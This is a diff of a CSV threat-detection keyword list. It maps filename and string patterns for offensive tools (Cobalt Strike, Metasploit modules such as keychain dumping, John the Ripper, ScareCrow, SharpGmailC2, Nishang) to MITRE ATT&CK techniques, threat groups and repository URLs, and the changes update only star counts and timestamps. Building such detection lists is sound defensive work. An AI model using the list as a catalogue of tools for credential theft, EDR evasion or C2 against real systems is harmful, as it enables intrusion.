T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*openPortScanner*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openSpearPhishDialog*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*openssl_heartbleed.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*openssl2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openssl_heartbleed.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*openssl2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*OpenVAS*","offensive_tool_keyword","openvas","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.openvas.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*openwall.John.appdata.xml*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*openwall.John.desktop*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*openwall/john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openwall.John.appdata.xml*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openwall.John.desktop*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openwall/john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*openWindowsExecutableStage*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Operative Framework*","offensive_tool_keyword","Operative Framework","Framework based on fingerprint action. this tool is used for get information on a website or a enterprise target with multiple modules.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0007 - TA0011 - TA0007","N/A","N/A","Frameworks","https://github.com/graniet/operative-framework","1","0","N/A","N/A","7","634","180","2023-05-12T06:20:09Z","2017-01-03T08:38:59Z" "*ophcrack*","offensive_tool_keyword","ophcrack","Windows password cracker based on rainbow tables.","T1110.003 - T1555.003 - T1110.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://gitlab.com/objectifsecurite/ophcrack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*optiv/Registry-Recon*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","10","10","314","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z" -"*optiv/ScareCrow*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*optiv/ScareCrow*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*oracle_default_hashes.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*oracle_default_passwords.csv*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*optiv/ScareCrow*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*optiv/ScareCrow*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*oracle_default_hashes.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*oracle_default_passwords.csv*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*orbitaldump.py*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*orbitaldump/orbitaldump*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*OrderFromC2 = ReadEmail()*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*OS-Command-Injection-Unix-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*OS-Command-Injection-Windows-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*OSCP-Archives*","offensive_tool_keyword","OSCP-Archives","resources for red teamers 'During my journey to getting the OSCP. I always come across many articles. Git repo. videos. and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great. I wanted to also build a curated list of the resources that I've collected overtime. all in one area for everyone to access.'","T1593 - T1592 - T1596","TA0001 - TA0043 - ","N/A","N/A","Exploitation tools","https://github.com/CyDefUnicorn/OSCP-Archives","1","1","N/A","N/A","7","601","196","2020-09-14T13:01:57Z","2018-09-15T16:18:05Z" -"*osmedeus cloud*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*osmedeus health*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*osmedeus provider*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*osmedeus scan*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*osmedeus utils*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*osx/dump_keychain*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*osx_gatekeeper_bypass.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*OtterHacker/SetProcessInjection*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*osmedeus cloud*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus health*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus provider*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus scan*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus utils*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osx/dump_keychain*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*osx_gatekeeper_bypass.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*OtterHacker/SetProcessInjection*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*ourtn-ftshell-upcommand*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*-out*.exe -r:*System.Drawing.dll*System.Management.Automation*.dll*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","0","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*--out=nimcrypt*","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","1","83","5","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" -"*Out-CompressedDLL.ps1*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*Out-DnsTxt.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" 